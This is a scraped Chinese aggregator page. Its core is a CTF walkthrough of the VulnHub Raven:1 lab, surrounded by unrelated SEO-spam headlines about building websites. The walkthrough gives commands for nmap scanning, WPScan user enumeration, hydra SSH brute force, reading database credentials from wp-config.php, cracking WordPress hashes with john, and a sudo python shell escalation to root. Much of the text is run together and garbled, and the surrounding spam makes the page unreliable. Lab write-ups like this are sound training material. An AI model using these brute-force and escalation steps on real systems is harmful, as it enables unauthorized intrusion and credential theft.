当前位置: 首页 > news >正文

医学类的网站做Google做乐高肖像的网站

医学类的网站做Google,做乐高肖像的网站,官网建设目标,如何做自己的淘宝网站一、准备工作 kali和靶机都选择NAT模式#xff08;kali与靶机同网段#xff09; 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 #xff08;1#xff09;扫描靶机开放的…一、准备工作 kali和靶机都选择NAT模式kali与靶机同网段 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 1扫描靶机开放的端口及其服务 nmap -A 192.168.101.127 2.网站的信息收集 1靶机开放了80端口,先访问靶机网站看看有什么有用的信息 1.访问到http://192.168.101.127/service.html它的源码发现flag1 2.进入到BLOG发现wordpress网站 3.看到wordpress网站后台登录到入口 DNS域名解析有问题 4.添加后台域名到hosts文件 1编辑hosts文件添加如下内容 sudo vim /etc/hosts 192.168.101.127 raven.local wq 2重新刷新页面访问成功 2WPscan工具 探测WordPress的漏洞可以直接使用kali自带的WPscan先暴力枚举用户名 wpscan --url http://192.168.101.127/wordpress/ -eu 1.发现了两个用户michael和steven将收集到的用户放到user.txt 3hydra工具暴力破解 1.使用hydra运用自身密码库进行暴力破解 cp /usr/share/wordlists/rockyou.txt pass hydra -L user.txt -P pass 192.168.101.127 ssh 获取到ssh登录到用户密码michael 4ssh远程登录 ssh michael192.168.101.127 三、漏洞的发现及利用 1.寻找一下flag相关文件 find / -name *flag* 2/dev/null 1查看flag2.txt,拿到flag2 cat /var/www/flag2.txt 2.MySQL 1查看靶机是否运行mysql ps -ef |grep mysql 2切换到wordpress目录发现config配置文件可能存在用户密码 cd /var/www/html/wordpress ls -la 3查看config文件发现了数据库的用户密码 用户密码为root、Rv3nSecurity cat wp-config.php 4用刚才收集到的数据库用户密码登录mysql mysql -u root -p Rv3nSecurity 5查看mysql的数据库 show databases; 6获取数据库里面的flag3、flag4 use wordpress ; show tables ; desc wp_posts; select * from wp_posts; 7发现两组用户密码 use wordpress ; select * from wp_wp_users ; michael :$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ 8john解码最后得到stevenpink84 把密码放入文件swn里面通过john解码 vim swn.txt cat swn.txt john swn.txt --wordlist/usr/share/wordlists/rockyou.txt 四、提权 1使用steven用户远程登录ssh ssh steven192.168.101.127 pink84 2利用优化命令执行终端的命令提权 sudo python -c import pty; pty.spawn(/bin/bash); flag也可在root查看
http://www.zqtcl.cn/news/2134/

相关文章:

  • 家具品牌网站广州网站制作工作室
  • 网站整站建设网络营销网站设计
  • 做外卖骑手用哪个网站play商店
  • 山东网站制作软件绍兴百度seo排名
  • 旅游网站内容规划网站开发按几年摊销
  • 为什么只有建设网站打不开免费推广网站工具
  • seo网站优化策划书创建wordpress网站
  • 合肥专业做淘宝网站wordpress安装云
  • 论坛类网站备案吗彩票网站开发亿云
  • 成都公司网站开发用什么网站做浏览器主页
  • 雅安市住房和城乡建设局网站餐饮设计公司网站
  • 长春网页制作建站沈阳网站建设 网络服务
  • 网站上面的彩票快3怎么做培训机构管理系统
  • 深圳制作网站多少费用学包装设计网站
  • wordpress网站数据库备份咨询公司来公司做调查
  • 抚顺网站seo兴安盟住房和城乡建设部网站
  • 电子商务网站系统建设实训心得简单建站
  • 微信链接网站怎么做的网站设计与开发期末考试题
  • 婚纱摄影网站源码asp的网站建立
  • 重庆网站推广运营红圈工程项目管理软件
  • 北京通州区网站制作学做网站能赚多少钱
  • 网站开发 就业简历模板汕头各类免费建站
  • 旅游网站排行榜前20网站建设合同的法律
  • 网站管理系统怎么用莱芜信息港莱芜在线
  • 卓越网站建设的优点上海信息价查询造价信息网
  • 珠海医疗网站建设网站建设网站源码
  • 建设网站能自学吗.net搭建企业网站
  • 制作一个网站需要多长时间如何制作境外网站
  • 做网站多少人wordpress中文文章排版插件
  • 阜阳微商城网站建设辽宁奔之流建设工程有限公司网站